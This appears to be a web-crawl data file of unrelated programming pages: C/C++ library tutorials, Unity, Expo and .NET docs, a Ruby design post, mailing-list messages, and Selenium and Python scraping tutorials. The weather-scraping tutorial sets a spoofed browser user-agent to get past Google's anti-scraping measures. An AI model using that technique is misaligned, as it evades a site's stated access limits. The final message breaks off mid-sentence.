tbl_nbrs = ["B01001","B15002","B03002","B17001","B23001","B25002","B25004","B25024","B25032","B25007","B11016","B25106","B25064","B25063","B19013","B19001","B25072","B19019","B19001"] for tbl_nbr in tbl_nbrs[1:5]: print(tbl_nbr) browser.find_element_by_class_name('remove-it').click() time.sleep(3) browser.find_element_by_id('searchTopicInput').click() browser.find_element_by_id('searchTopicInput').send_keys(tbl_nbr) browser.find_element_by_id('df-go-div').find_element_by_class_name('button-g').click() time.sleep(1) cols=browser.find_element_by_id('resulttable').find_elements_by_class_name('yui-dt-col-d_dataset') check = [] for col in cols[1:]: if(col.text[5:]=='ACS 5-year estimates'): check.append(1) else: check.append(0) checkboxes = browser.find_elements_by_name('prod') for x in range(0,len(check)): if(check[x]==1): checkboxes[x].click()
After the tables have been chosen, you can now click download. Since I am downloading 40 tables at a time, I do not want to wait until all files a processed before I can hit download button. This is why I added some extra codes to watch the button for me. Although this is not a good design, I just only want a quick piece of code that works. If this were to be executed regularly I would recommend using waits to wait for a DOM element to be ready. Same goes for the automation part which relies on the sleep function.
while(1): if(browser.find_element_by_id('yui-gen5-button').is_enabled()): browser.find_element_by_id('yui-gen5-button').click() break time.sleep(5) # browser.find_element_by_id('yui-gen14-button').is_enabled()
|
https://siravich-khongrod.github.io/blog/automating-download-on-American-Fact-Finder.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
strcat() prototype
char* strcat( char* dest, const char* src );
The
strcat() function takes two arguments: dest and src. This function appends a copy of the character string pointed to by src tocat() Parameters
dest: Pointer to a null terminating string to append to.
src: Pointer to a null terminating string that is to be appended.
strcat() Return value
The strcat() function returns dest, the pointer to the destination string.
Example: How strcat() function works
#include <cstring> #include <iostream> using namespace std; int main() { char dest[50] = "Learning C++ is fun"; char src[50] = " and easy"; strcat(dest, src); cout << dest ; return 0; }
When you run the program, the output will be:
Learning C++ is fun and easy
|
https://www.programiz.com/cpp-programming/library-function/cstring/strcat
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
This program takes two positive integers as input from the user and calculates GCD using recursion.
Visit this page to learn how you can calculate the GCD using loops.
GCD of Two Numbers using Recursion
#include <stdio.h> int hcf(int n1, int n2); int main() { int n1, n2; printf("Enter two positive integers: "); scanf("%d %d", &n1, &n2); printf("G.C.D of %d and %d is %d.", n1, n2, hcf(n1, n2)); return 0; } int hcf(int n1, int n2) { if (n2 != 0) return hcf(n2, n1 % n2); else return n1; }
Output
Enter two positive integers: 366 60 G.C.D of 366 and 60 is 6.
In this program, recursive calls are made until the value of n2 is equal to 0.
|
https://www.programiz.com/c-programming/examples/hcf-recursion
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Unlike vsprintf(), the maximum number of characters that can be written to the buffer is specified in
vsnprintf().
vsnprintf() prototype
int vsnprintf( char* buffer, size_t buf_size, const char* format, va_list vlist );
The
vsnprintf() function writes the string pointed to by format to a character string buffer. The maximum number of characters that can be written is buf_size. After the characters are written, a terminating null character is added. If buf_size is equal to zero, nothing is written and buffer may be a null pointer.
The string format may contain format specifiers starting with % which are replaced by the values of variables that are passed as a list vlist.
It is defined in <cstdio> header file.
vsnprintf() Parameters
- buffer: Pointer to a character string to write the result.
- buf_size: Maximum number of characters to write.
-nprintf() Return value
- If successful, the
vsnprintf()function returns number of characters written.
- On failure it returns a negative value.
- When the length of the formatted string is greater than buf_size, it needs to be truncated. In such cases, the
vsnprintf()function returns the total number of characters excluding the terminating null character which would have been written, if the buf_size limit was not imposed.
Example: How vsnprintf() function works
#include <cstdio> #include <cstdarg> void write(char* buf, int buf_size, const char *fmt, ...) { va_list args; va_start(args, fmt); vsnprintf(buf, buf_size, fmt, args); va_end(args); } int main () { char buffer[100]; char fname[20] = "Bjarne"; char lname[20] = "Stroustrup"; char lang[5] = "C++"; write(buffer, 27, "%s was created by %s %s\n", lang, fname, lname); printf("%s", buffer); return 0; }
When you run the program, the output will be:
C++ was created by Bjarne
|
https://www.programiz.com/cpp-programming/library-function/cstdio/vsnprintf
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
As you may know, Web scraping is essentially extracting data from websites. Doing such task in a high-level programming language like Python is very handy and powerful. In this tutorial, you will learn how to use requests and BeautifulSoup to scrape weather data from Google search engine.
Although, this is not the perfect and official way to get the actual weather for a specific location, because there are hundreds of weather APIs out there to use. However, it is a great exercise for you to get familiar with scraping.
Related: How to Make an Email Extractor in Python.
Alright, let's get started, installing the required dependencies:
pip3 install requests bs4
First, let's experiment a little bit, open up a Google search bar and type for instance: "weather london", you'll see the official weather, let's right click and inspect HTML code as shown in the following figure:
Note: Google does not have its appropriate weather API, as it also scrapes weather data from weather.com, so we are essentially scraping from it.
You'll be forwarded to HTML code that is responsible for displaying the region, day and hour, and the actual weather:
Great, let's try to extract these information in a Python interactive shell quickly:
In [7]: soup = BeautifulSoup(requests.get("").content) In [8]: soup.find("div", attrs={'id': 'wob_loc'}).text Out[8]: 'London, UK'
Don't worry about how we created the soup object, all you need to worry about right now is how you can grab that information from HTML code, all you have to specify to soup.find() method is the HTML tag name and the matched attributes, in this case, a div element with an id of "wob_loc" will get us the location.
Similarly, let's extract current day and time:
In [9]: soup.find("div", attrs={"id": "wob_dts"}).text Out[9]: 'Wednesday 3:00 PM'
The actual weather:
In [10]: soup.find("span", attrs={"id": "wob_dc"}).text Out[10]: 'Sunny'
Alright, now you are familiar with it, let's create our quick script for grabbing more information about the weather ( as much information as we can ). Open up a new Python script and follow with me.
First, let's import necessary modules:
from bs4 import BeautifulSoup as bs import requests
It is worth to note that Google tries to prevent us to scrape its website programmatically, as it is an unofficial way to get data, because it provides us with a convenient alternative, which is The Custom Search Engine, but just for educational purposes, we gonna pretend that we are a legitimate web browser, let's define the user agent:
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" # US english LANGUAGE = "en-US,en;q=0.5"
Let's define a function that given a URL, it tries to extract all useful weather information and return it in a dictionary:
def get_weather_data(url): session = requests.Session() session.headers['User-Agent'] = USER_AGENT session.headers['Accept-Language'] = LANGUAGE session.headers['Content-Language'] = LANGUAGE html = session.get(url) # create a new soup soup = bs(html.text, "html.parser")
All we did here, is to create a session with that browser and language, and then download the HTML code using session.get(url) from the web, and finally creating the BeautifulSoup object with an HTML parser.
Let's get current region, weather, temperature and actual day and hour:
# store all results on this dictionary result = {} # extract region result['region'] = soup.find("div", attrs={"id": "wob_loc"}).text # extract temperature now result['temp_now'] = soup.find("span", attrs={"id": "wob_tm"}).text # get the day and hour now result['dayhour'] = soup.find("div", attrs={"id": "wob_dts"}).text # get the actual weather result['weather_now'] = soup.find("span", attrs={"id": "wob_dc"}).text
Since the current precipitation, humidity and wind are displayed, why not grab them ?
# get the precipitation result['precipitation'] = soup.find("span", attrs={"id": "wob_pp"}).text # get the % of humidity result['humidity'] = soup.find("span", attrs={"id": "wob_hm"}).text # extract the wind result['wind'] = soup.find("span", attrs={"id": "wob_ws"}).text
Let's try to get weather information about the next few days, if you take some time finding the HTML code of it, you'll find something similar to this:
<div class="wob_df" style="display:inline-block;line-height:1;text-align:center;-webkit-transition-duration:200ms,200ms,200ms;-webkit-transition-property:background-image,border,font-weight;font-weight:13px;height:90px;width:73px" data- <div class="vk_lgy" style="padding-top:7px;line-height:15px" aria-Sat</div> <div style="display:inline-block"><img style="margin:1px 4px 0;height:48px;width:48px" alt="Sunny" src="//ssl.gstatic.com/onebox/weather/48/sunny.png" data-</div> <div style="font-weight:normal;line-height:15px;font-size:13px"> <div class="vk_gy" style="display:inline-block;padding-right:5px"><span class="wob_t" style="display:inline">25</span><span class="wob_t" style="display:none">77</span>°</div> <div class="vk_lgy" style="display:inline-block"><span class="wob_t" style="display:inline">17</span><span class="wob_t" style="display:none">63</span>°</div> </div> </div>
Not human readable, I know, but this parent div contains all information about one next day, which is "Saturday" as shown in the first child div element with the class of vk_lgy in the aria-label attribute, the weather information is within the alt attribute in the img element, in this case "Sunny". The temperature however, there is a max and min with both Celsius and Fahrenheit, this lines of code takes care of everything:
# get next few days' weather next_days = [] days = soup.find("div", attrs={"id": "wob_dp"}) for day in days.findAll("div", attrs={"class": "wob_df"}): # extract the name of the day day_name = day.find("div", attrs={"class": "vk_lgy"}).attrs['aria-label'] # get weather status for that day weather = day.find("img").attrs["alt"] temp = day.findAll("span", {"class": "wob_t"}) # maximum temparature in Celsius, use temp[1].text if you want fahrenheit max_temp = temp[0].text # minimum temparature in Celsius, use temp[3].text if you want fahrenheit min_temp = temp[2].text next_days.append({"name": day_name, "weather": weather, "max_temp": max_temp, "min_temp": min_temp}) # append to result result['next_days'] = next_days return result
Now result dictionary got everything we need, let's finish up the script by parsing command line arguments using argparse:
if __name__ == "__main__": URL = "" import argparse parser = argparse.ArgumentParser(description="Quick Script for Extracting Weather data using Google Weather") parser.add_argument("region", nargs="?", help="""Region to get weather for, must be available region. Default is your current location determined by your IP Address""", default="") # parse arguments args = parser.parse_args() region = args.region URL += region # get data data = get_weather_data(URL)
Displaying everything:
# print data print("Weather for:", data["region"]) print("Now:", data["dayhour"]) print(f"Temperature now: {data['temp_now']}°C") print("Description:", data['weather_now']) print("Precipitation:", data["precipitation"]) print("Humidity:", data["humidity"]) print("Wind:", data["wind"]) print("Next days:") for dayweather in data["next_days"]: print("="*40, dayweather["name"], "="*40) print("Description:", dayweather["weather"]) print(f"Max temperature: {dayweather['max_temp']}°C") print(f"Min temperature: {dayweather['min_temp']}°C")
If you run this script, it will automatically grab the weather of your current region determined by your IP address. However, if you want a different region, you can pass it as arguments:
C:\weather-extractor>python weather.py "New York"
This will show weather data of New York state in the US:
Weather for: New York, NY, USA Now: wednesday 2:00 PM Temperature now: 20°C Description: Mostly Cloudy Precipitation: 0% Humidity: 52% Wind: 13 km/h Next days: ======================================== wednesday ======================================== Description: Mostly Cloudy Max temperature: 21°C Min temperature: 12°C ======================================== thursday ======================================== Description: Sunny Max temperature: 22°C Min temperature: 14°C ======================================== friday ======================================== Description: Partly Sunny Max temperature: 28°C Min temperature: 18°C ======================================== saturday ======================================== Description: Sunny Max temperature: 30°C Min temperature: 19°C ======================================== sunday ======================================== Description: Partly Sunny Max temperature: 29°C Min temperature: 21°C ======================================== monday ======================================== Description: Partly Cloudy Max temperature: 30°C Min temperature: 19°C ======================================== tuesday ======================================== Description: Mostly Sunny Max temperature: 26°C Min temperature: 16°C ======================================== wednesday ======================================== Description: Mostly Sunny Max temperature: 25°C Min temperature: 19°C
Alright, we are done with this tutorial, I hope this was helpful for you to understand how you can combine requests and BeautifulSoup to grab data from web pages.
By the way, there is another tutorial for extracting YouTube videos data in Python or accessing wikipedia pages in Python !
Read also: How to Extract All Website Links in Python.
Happy Scraping ♥View Full Code
|
https://www.thepythoncode.com/article/extract-weather-data-python
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
expo-assetprovides an interface to Expo's asset system. An asset is any file that lives alongside the source code of your app that the app needs at runtime. Examples include images, fonts, and sounds. Expo's asset system integrates with React Native's, so that you can refer to files with
require(.
expo install expo-asset
To use this in a bare React Native app, follow the installation instructions.
import { Asset } from 'expo-asset';.
Asset.fromModule(module).downloadAsyncfor convenience.
require('path/to/file'). Can also be just one module without an Array.
require('path/to/file')for the asset
const imageURI = Asset.fromModule(require('./assets/snack-icon.png')).uri;
imageURIgives the remote URI that the contents of
assets/snack-icon.pngcan be read from. The path is resolved relative to the source file that this code is evaluated in.
|
https://docs.expo.io/versions/v36.0.0/sdk/asset/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Sprite オブジェクトを新規に作成します
Sprite. The
rect argument is defined in
pixels of the texture. A Rect(50.0f, 10.0f, 200.0f, 140.0f) would create a left to right
range from 50.0f to 50.0f + 200.0f = 250.0f. The bottom to top range would be 10.0f to
10.0f + 140.0f = 150.0f.
The third argument
pivot determines what becomes the center
of the Sprite. This is a
Vector2 relative to the
rect where Vector2(0.0f, 0.0f) is the bottom
left and Vector2(1.0f, 1.0f) is the top right. The pixelsPerUnit value controls
the size of the sprite. Reducing this below 100 pixels per world increases the size of
the sprite. The
extrude value defines the number of pixels which surround the
Sprite.
This is useful if the Sprite is included in an atlas.
meshType selects whether
FullRect or
Tight is used. Finally
border determines the rectangle size of the
Sprite. The Sprite can be provided spaces around it.
See Also: SpriteRenderer class.
// Create a Sprite at start-up. // Assign a texture to the sprite when the button is pressed.
using UnityEngine;
public class spriteCreate : MonoBehaviour { public Texture2D tex; private Sprite mySprite; private SpriteRenderer sr;
void Awake() { sr = gameObject.AddComponent<SpriteRenderer>() as SpriteRenderer; sr.color = new Color(0.9f, 0.9f, 0.9f, 1.0f);
transform.position = new Vector3(1.5f, 1.5f, 0.0f); }
void Start() { mySprite = Sprite.Create(tex, new Rect(0.0f, 0.0f, tex.width, tex.height), new Vector2(0.5f, 0.5f), 100.0f); }
void OnGUI() { if (GUI.Button(new Rect(10, 10, 100, 30), "Add sprite")) { sr.sprite = mySprite; } } }
|
https://docs.unity3d.com/ja/2018.2/ScriptReference/Sprite.Create.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Subject: Re: [boost] [explore] Extending namespace std
From: Maurizio Vitale (maurizio.vitale_at_[hidden])
Date: 2009-12-16 09:54:19
>>>>> "Robert" == Robert Ramey <ramey_at_[hidden]> writes:
Robert> Jeffrey Faust wrote:
>>> In regards to extending namespace std, I understand what the
>>> standard says and I think I understand the reasons behind it.
>>> One could add something to namespace std that conflicts with an
>>> existing item, changing the behavior. This is undefined
>>> behavior, and the standard is right in restricting it. I don't
>>> believe this problem exists for this library in how we plan to
>>> extend std.
Robert> How can anyone possibly know that? That is, how could two
Robert> different developers who didn't know each other possibly
Robert> know that they weren't going to conflict?
Robert> Of course if you wanted to officially extended the namespace
Robert> that would be a different thing entirely.
It is more than conflict: the C++ standard fully defines the content of
std and compilers are not required to implement it as they implement
other namespaces, as long as they behave as if such a namespace was
defined.
In particular, turning the entire namespace std { } block into a
compiler-time nop is entirely ok.
Not that this happens with any of the presently available compilers, but
it could.
On the other hand, if we can get some nice functionality that cannot be
achieved otherwise, I wouldn't have too many problems with being
pragmatic and extending std.
If it becomes very useful, it might be accepted into the standard or
additional mechanisms not relying on extending std may be provided.
Best regards,
Maurizio
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
|
https://lists.boost.org/Archives/boost/2009/12/160219.php
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Sometimes .NET world, this would be the equivalent of using the generics collections like List
One of the things that I’m slowly starting to learn is that excess nil checks are a sign that I’m doing something wrong. In this case, a sign that I may be creating too many layers of models and abstractions. I’m not saying I should never create custom models. But I think there are times when I can simplify my code significantly by using a hash and flattening my code structure into it, instead of relying on custom models.
An Example: A Hash Vs A Class, Used In A View
Examine the following code from a HAML based view in a rails app. and pay attention to the ‘lipids’ and ‘genetics’ variables and how they are used.
- lipids = decision_panel.lipids - genetics = decision_panel.genetics %ul %li %p Apo E = scored_value_tag genetics[:apo_e] %li %p LDL: = scored_value_tag lipids.vldl if lipids
There’s nothing terribly magical or special about this code or the use of either of these variables. It does, however, illustrate a subtle yet potentially important distinction between how the lipids and genetics attributes were implemented on the decision_panel class and these differences can have a profound impact on the code that uses them.
The obvious difference between lipids and genetics is that the lipids is a custom class implementation while genetics is a hash. Even without seeing the implementations this is fairly apparent by the syntax. The call to lipids.vldl is not a standard method name on any standard ruby objects. It’s specific to the domain that I’m working in (health care). This gives an indication of the vldl attribute being defined in a class somewhere. Contrast that to the use of generics, which accesses a value via the named key of a hash. It’s very likely that the genetics variable is a hash, given the syntax used.
Nil Checks Can Cause Ugly Things
This is one of the lessons that I’ve been learning the hard way. Look at the difference in use between lipids and genetics in the above code. The line that calls into lipids has an “if lipids” check at the end of it. This is necessary because the lipids variable may be nil. The implementation of the decision_panel.lipids attribute is doing something that may or may not return a valid lipids class. In this specific case, it’s loading data from the database based on some criteria. If that criteria fails to find anything to load, then a nil will be returned.
class DecisionPanel def lipids Lipids.where(:some_criteria => "some value") end end
It gets worse when we look at what this does to the UI, too. The “if lipids” check at the end of the line causes the entire line of code to not produce anything if the lipids variable is nil. By contract, the call into a hash to get a value may return nil but that nil return value will never cause the line of code to not be executed. When we look at the output of this type of code in our application, we can easily end up with something that looks like this:
(In the off-chance that you actually know what “Apo E” is, please ignore the invalid value of “0”. This is just test data for my dev evironment.)
It may be ok for your screens to end up looking like this, but I don’t consider this to be good practice. Having a label for nothing on the screen tends to make users think there is something wrong with the system. It would be much better to have the LDL label showing “N/A” or something equivalent if there is no LDL data to show. However, the way we implemented our models make this less than beautiful in our code.
In order to show “N/A” we have to do some nil checks. Remember, though, that this LDL line of code is already doing a nil check to make sure the lipids variable is not nil. The verbose way of making this work would be an if-then statement around the code
- if lipids = scored_value_tag lipids.vldl - else = scored_value_tag "N/A"
This code is functional, but it is getting pretty verbose and also duplicating a little bit by having to call the ‘scored_value_tag’ method on multiple lines. We can clean this up a little, though
- vldl = (lipids.vldl if lipids) || nil = scored_value_tag vldl || "N/A"
The first line does all of the if-then checks for us and either assigns vldl to the vldl value or to nil if the lipids variable doesn’t exist. There are actually two separate if-then statements tacked together into this one line, to ensure that we always have a variable to use. If we don’t do this, then we could end up with an exception being thrown when we try to use vldl on the next line.
… that’s 3 if-then statements composed in two lines of code, all surrounding nil checks. That’s a lot of nil checks just to get an “N/A” blob of text to show up in a web page, and quite frankly, a bunch of ugly code (that I’m guilty of writing over and over and over again).
One way this can be remedied is by using the null object pattern in the decision_panel.lipids method. We could have that method always return an object, even when there was no object found, and provide some default behavior to say “N/A” instead of providing an actual value. This may be a good option for you and your scenario. In my case, though, the use of a null object pattern is a little overkill.
In my case, I am starting to see this type of code as …
A Sign That You May Want A Hash Instead
Let’s look at the aggregate code that we’ve ended up with, having implemented the various nil checks from the previous examples. At the same time, let’s add in the code that is needed to produce the same “N/A” value if the genetics code return a nil value:
- lipids = decision_panel.lipids - genetics = decision_panel.genetics %ul %li %p Apo E - apo_e = genetics[:apo_e] || "N/A" = scored_value_tag apo_e %li %p LDL: - vldl = (lipids.vldl if lipids) || nil = scored_value_tag vldl || "N/A"
Tell me, which of those would you rather read when you first encounter this view in the rails app? It’s a pretty easy choice in my book. The use of a hash in this case, has removed 2 out of 3 of the nil checks. The code is significantly easier to read and understand, and easier to modify because there are not a bunch of edge-case nil checks that have to be made.
How, then, do we recognize when it would be easier and/or better to use a hash than to use a custom class? In this case, the excessive nil checks in the code are a sign that we’re doing something wrong. However, there are multiple ways to solve this, including the null object pattern I mentioned previously.
The real sign that this is probably better off as a hash is when we look at the implementation of the lipids class. For effect, I’m posting the entire class, unedited. Ignore the methods and modules that you don’t recognize – just know that they are a part my system and they do what I need.
class Lipids include DataParser def initialize(obr_segment) @obr = obr_segment end def total value = get_obx_value @obr, "0058-8" @scored_total ||= ScoredValue.new(value, :lipids_total) end def hdl value = get_obx_value @obr, "0059-6" @scored_hdl ||= ScoredValue.new(value, :lipids_hdl) end def hdl_percentage value = get_obx_value @obr, "1764-0" @scored_hdl_percentage ||= ScoredValue.new(value, :lipids_hdl_percentage) end def ldl_calc value = (total.value.to_f - (hdl.value.to_f + vldl.value.to_f)).to_s @scored_ldl_calc ||= ScoredValue.new(value, :lipids_ldl_calc) end def triglycerides value = get_obx_value @obr, "0155-2" @scored_triglycerides ||= ScoredValue.new(value, :lipids_triglycerides) end def vldl value = get_obx_value @obr, "0505-8" @scored_vldl ||= ScoredValue.new(value, :lipids_vldl) end def non_hdl_total value = total.value.to_f - hdl.value.to_f @scored_non_hdl_total ||= ScoredValue.new(value, :lipids_non_hdl_percentage) end def non_hdl_percentage value = (non_hdl_total.value.to_f / total.value.to_f) * 100 value.to_i.to_s end def ldl_hdl_ratio value = get_obx_value @obr, "0253-5" @scored_ldl_hdl_ratio ||= ScoredValue.new(value, :lipids_ldl_hdl_ratio) end end
The end result of this class definition is that I now have a way to access a just-in-time calculated, cached value by name. Does that sound familiar at all? I hope it does, because with the exception of JIT calculation, I just described a hash: “A Hash is a collection of key-value pairs.” (from Ruby-Doc.org).
Now compare the Lipids class with the code that builds the genetics hash:
def genetics @genetics ||= { :apo_e => ScoredValue.new(lab.apo_e, :apo_e), :apo_b => ScoredValue.new(lab.apo_b, :apo_b), :lp_a => ScoredValue.new(lab.lp_a, :lp_a), :nt_pro_bnp => ScoredValue.new(lab.nt_pro_bnp, :nt_pro_bnp), :kif_6 => ScoredValue.new(lab.kif_6, :kif_6) } end
This code does essentially the same thing (without a calculation, though that would be simple to add to this code) but does it with a hash instead of a custom class. There is far less code to read, even if you account for the calculations that need to be done, and it’s generally easier to see that this is just access to a named set of value. This code also eliminates the desire to have an explicit null object pattern implementation. If the ScoredValue class receives a nil as the first parameter, it can just return “N/A” for us and we don’t have to deal with yet another design pattern and layer of abstraction in our system.
Given the relative simplicity of the genetics hash compared to the lipids class, why, then, am I using a class to define access to a value via a method, which is essentially just a key to get the value that I need? What benefit am I introducing to my system by modeling the access to my data in this way? I honestly don’t think I’m adding any value in this case, and as I’ve shown with my previous discussion of nil checks, I think I’m actually doing more harm than good.
What About Encapsulation Of Business Logic, or … ?
You might be tempted to run off and say that you don’t need custom classes, ever, in your ruby apps. Don’t. That’s just not true. There are times when a custom class or model is appropriate. You may have some business process that needs to be modeled and encapsulated correctly, etc. Hashes are not a panacea or silver bullet. They are, however, a great tool to have in your tool belt. I, for one, am beginning to re-evaluate what I now think is an excessive us of hand-rolled classes and ugly, noisy nil checks.
|
https://lostechies.com/derickbailey/2011/05/25/sometimes-its-better-to-use-a-ruby-hash-than-create-a-custom-class/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
fread() prototype
size_t fread(void * buffer, size_t size, size_t count, FILE * stream);
The
fread() function reads count number of objects, each of size size bytes from the given input stream. It is similar to calling fgetc() size times to read each object. According to the number of characters read,read will return zero and no other action is performed.
It is defined in <cstdio> header file.
fread() Parameters
- buffer: Pointer to the block of memory to store the objects.
- size: Size of each objects in bytes.
- count: The number of objects to read.
- stream: The file stream to read the data from.
fread() Return value
The
fread() function returns the number of objects read successfully. If an error or end of file condition occurs, the return value may be less than count.
Example 1: How fread() function works
#include <iostream> #include <cstdio> using namespace std; int main() { FILE *fp; char buffer[100]; fp = fopen("data.txt","rb"); while(!feof(fp)) { fread(buffer,sizeof(buffer),1,fp); cout << buffer; } return 0; }
Suppose the file contains following data:
Dennis Ritchie : C Bjarne Stroustrup : C++ Guido van Rossum : Python James Gosling : Java
When you run the program, the output will be:
Dennis Ritchie : C Bjarne Stroustrup : C++ Guido van Rossum : Python James Gosling : Java
Example 2: How fread() function works when either count or size is zero
#include <iostream> #include <cstdio> using namespace std; int main() { FILE *fp; char buffer[100]; int retVal; fp = fopen("data.txt","rb"); /* when count is zero */ retVal = fread(buffer,sizeof(buffer),0,fp); cout << "When count = 0, return value = " << retVal << endl; /* when size is zero */ retVal = fread(buffer,0,1,fp); cout << "When size = 0, return value = " << retVal << endl; return 0; }
When you run the program, the output will be:
When count = 0, return value = 0 When size = 0, return value = 0
|
https://www.programiz.com/cpp-programming/library-function/cstdio/fread
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Animation
Clock Class
Definition
Maintains the run-time state of an AnimationTimeline and processes its output values.
public ref class AnimationClock : System::Windows::Media::Animation::Clock
public class AnimationClock : System.Windows.Media.Animation.Clock
type AnimationClock = class inherit Clock
Public Class AnimationClock Inherits Clock
- Inheritance
- AnimationClock
Remarks
AnimationClock objects are generated from AnimationTimeline objects. An AnimationTimeline describes an animation's output values, duration, begin time, end time, and other fundamental animation information. An AnimationClock processes the animation values described by an AnimationTimeline object.
|
https://docs.microsoft.com/en-au/dotnet/api/system.windows.media.animation.animationclock?view=netframework-4.8
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
The drawback to the safety system’s process of copying data is that it also isolates the results of a job within each copy. To overcome this limitation you need to store the results in a type of shared memory called NativeContainer.
A
NativeContainer is a managed value type that provides a relatively safe C# wrapper for native memory. It contains a pointer to an unmanaged allocation. When used with the Unity C# Job System, a
NativeContainer allows a job to access data shared with the main thread rather than working with a copy.
Unity ships with a
NativeContainer called NativeArray. You can also manipulate a
NativeArray with NativeSlice to get a subset of the
NativeArray from a particular position to a certain length.
Note: The Entity Component System (ECS) package extends the
Unity.Collections namespace to include other types of
NativeContainer:
NativeList- a resizable
NativeArray.
NativeHashMap- key and value pairs.
NativeMultiHashMap- multiple values per key.
NativeQueue- a first in, first out (FIFO) queue.
The safety system is built into all
NativeContainer types. It tracks what is reading and writing to any
NativeContainer.
Note: All safety checks on
NativeContainer types (such as out of bounds checks, deallocation checks, and race condition checks) are only available in the Unity Editor and Play Mode.
Part of this safety system is the DisposeSentinel and AtomicSafetyHandle. The
DisposeSentinel detects memory leaks and gives you an error if you have not correctly freed your memory. Triggering the memory leak error happens long after the leak occurred.
Use the
AtomicSafetyHandle to transfer ownership of a
NativeContainer in code. For example, if two scheduled jobs are writing to the same
NativeArray, the safety system throws an exception with a clear error message that explains why and how to solve the problem. The safety system throws this exception when you schedule the offending job.
In this case, you can schedule a job with a dependency. The first job can write to the
NativeContainer, and once it has finished executing, the next job can then safely read and write to that same
NativeContainer. The read and write restrictions also apply when accessing data from the main thread. The safety system does allow multiple jobs to read from the same data in parallel.
By default, when a job has access to a
NativeContainer, it has both read and write access. This configuration can slow performance. The C# Job System does not allow you to schedule a job that has write access to a
NativeContainer at the same time as another job that is writing to it.
If a job does not need to write to a
NativeContainer, mark the
NativeContainer with the
[ReadOnly] attribute, like so:
[ReadOnly] public NativeArray<int> input;
In the above example, you can execute the job at the same time as other jobs that also have read-only access to the first
NativeArray.
Note: There is no protection against accessing static data from within a job. Accessing static data circumvents all safety systems and can crash Unity. For more information, see C# Job System tips and troubleshooting.
When creating a
NativeContainer, you must specify the type of memory allocation you need. The allocation type depends on the length of time the job runs. This way you can tailor the allocation to get the best performance possible in each situation.
There are three Allocator types for
NativeContainer memory allocation and release. You need to specify the appropriate one when instantiating your
NativeContainer.
NativeContainerallocations using
Tempto jobs. You also need to call the
Disposemethod before you return from the method call (such as MonoBehaviour.Update, or any other callback from native to managed code).
Tempbut is faster than
Persistent. It is for allocations within a lifespan of four frames and is thread-safe. If you don’t
Disposeof it within four frames, the console prints a warning, generated from the native code. Most small jobs use this
NativeContainerallocation type.
NativeContainerallocation type. You should not use
Persistentwhere performance is essential.
For example:
NativeArray<float> result = new NativeArray<float>(1, Allocator.TempJob);
Note: The number 1 in the example above indicates the size of the
NativeArray. In this case, it has only one array element (as it only stores one piece of data in
result).
2018–06–15 Page published
C# Job System exposed in 2018.1 NewIn20181
Did you find this page useful? Please give it a rating:
|
https://docs.unity3d.com/Manual/JobSystemNativeContainer.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
C Programming/wchar.h/wcsncmp< C Programming | wchar.h(Redirected from C Programming/C Reference/wchar.h/wcsncmp)
In C language, the function wcscmp is included in header file , wchar.h. The functions wcsncmp ,wcscmp , strncmp , strcmp are used to compare strings. Function wcsncmp, is similar to strncmp() , which is used to compare two fixed-size wide-character strings. it looks similar to strncmp() .This function is used to handle wide character strings. The wcsncmp() function is the wide-character equivalent of the strncmp() function. The function wcsncmp is similar to wcscmp, but it compares only first n characters.
Contents
DescriptionEdit
Wcsncmp is the standard library function used to compare two wide character strings. The function is similar to standard library function strcmp. But the comparison is not like strcmp. The first difference is that the function wcsncmp compares the two strings upto some limit(at most n character) i.e size_t n but strcmp compares the strings till '\0' occurs. and the second is that it handles wide characters as mentioned. It compares the wide-character string pointed to by say a and the wide character string pointed to by say b, but at most n wide characters from each string.
If the wide character string a is greater than wide character string b at first differentiating position i (i < n) then the function Wcsncmp returns positive integer and if second string is greater than first at the first differing position i (i < n), then the function wcsncmp returns negative integer. if the first i characters (i < n) of a and b are equal , the function wcsncmp returns 0.
Required Header FilesEdit
SyntaxEdit
#include<stdio.h>
#include <wchar.h>
int wcsncmp(const wchar_t *a, const wchar_t *b, size_t n);
|
https://en.m.wikibooks.org/wiki/C_Programming/C_Reference/wchar.h/wcsncmp
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
soya-user, hello pyopengl-users. This message isn't _totally_
relevant to pyopengl-users, but it's not unlikely that you guys have the
requesite knowledge to help me fix this problem.
I've been trying to get Soya3d
() working for a while,
but it's got problems with initialization. Soya3d talks to the OpenGL
API directly with Pyrex. The problem is that a bunch of the calls it's
making to OpenGL are returning NULL, while PyOpenGL calls to the same
functions are returning expected values. At first we thought this was a
problem with the way Soya was initializing GL (It uses SDL_Init to
accomplish this), like it wasn't properly waiting for the OpenGL system
to be initialized before it was making the calls. But to disprove that,
I wrote this bit of Pyrex code:
.. inside of soya's init() function...
from OpenGL import GL
print "PyOGL:", GL.glGetString(GL.GL_VENDOR)
my_dump_info()
cdef void my_dump_info():
cdef char* gl_vendor
gl_vendor = <char*> glGetString(GL_VENDOR)
if gl_vendor == NULL:
print "OGL: Wargh glGetString returned NULL"
check_gl_error()
else:
print "OGL:", PyString_FromString(gl_vendor)
GL.glGetString was returning the expected "NVIDIA Corporation", but the
direct call to the C glGetString is still returning NULL. The call to
check_gl_error does a glCheckError, but that's returning GL_NO_ERROR.
The same thing happens for stuff like glGetIntegerv.
So the only conclusion I can draw here is that somehow the PyOpenGL
interface is calling these functions in a way that's different from
pyrex's direct calls to them. I tried reading through the source of
PyOpenGL but the SWIG stuff wasn't elucidative. It just seems like the
wrappers are pretty direct. Does PyOpenGL involve some kind of different
context that it might use where a direct call to the C interface wouldn't?
--
Twisted | Christopher Armstrong: International Man of Twistery
Radix | Release Manager, Twisted Project
---------+
We don't do anything particularly fancy in the wrapper for glGetString,
